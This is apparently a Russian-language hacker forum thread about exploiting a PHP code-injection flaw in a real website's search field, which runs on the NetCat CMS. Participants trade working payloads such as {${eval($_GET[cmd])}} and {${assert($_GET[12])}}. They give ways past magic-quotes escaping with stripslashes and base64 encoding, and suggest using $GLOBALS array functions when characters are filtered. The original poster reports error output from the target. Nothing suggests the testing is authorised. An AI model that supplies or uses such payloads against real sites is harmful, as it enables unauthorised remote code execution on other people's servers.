На сайте найдена уязвимость в строке поиска забиваешь {${phpinfo()}} и получаешь всю раскладочку по нему. когда вбиваешь ковычку он её меняет на \ и удаляет всё что после. а каждую \ умножает на 2. как обойти логику?
Можно попробовать: Code: {${assert($_GET[12])}} Если _ тоже фильтруется, можно использовать PHP-функции для работы с массивами, наподобие end, restet, prev и использовать их по отношению к $GLOBALS или использовать функции(При фильтровании $), значение которых можно устанавливать самим, в названии которой не содержится фильтруемых символов, однако в зависимости от сборки таких может не быть. UDP: Для каждого отдельного случая нужно самостоятельно подбирать вариации кода.
Warning: assert() [function.assert]: Assertion failed in /var/www/...../www/netcat/require/s_list.inc.php(292) : eval()'d code on line 1 вот что выпало
Можно еще загонять в base64, с его помощью можно передавать большие запросы не боясь фильтра кавычек!
?action=index&text={${eval($_GET[cmd])}}&cmd=phpinfo(); как я понял у тебя MQ= on и ты сразу не можешь вставить код с кавычкой : ?action=index&text={${eval(stripslashes($_GET[cmd]))}}&cmd=echo 'fff';
Долго думает потом опера выдаёт следующее: Could not locate remote server Check that the address is spelled correctly, or try searching for the site.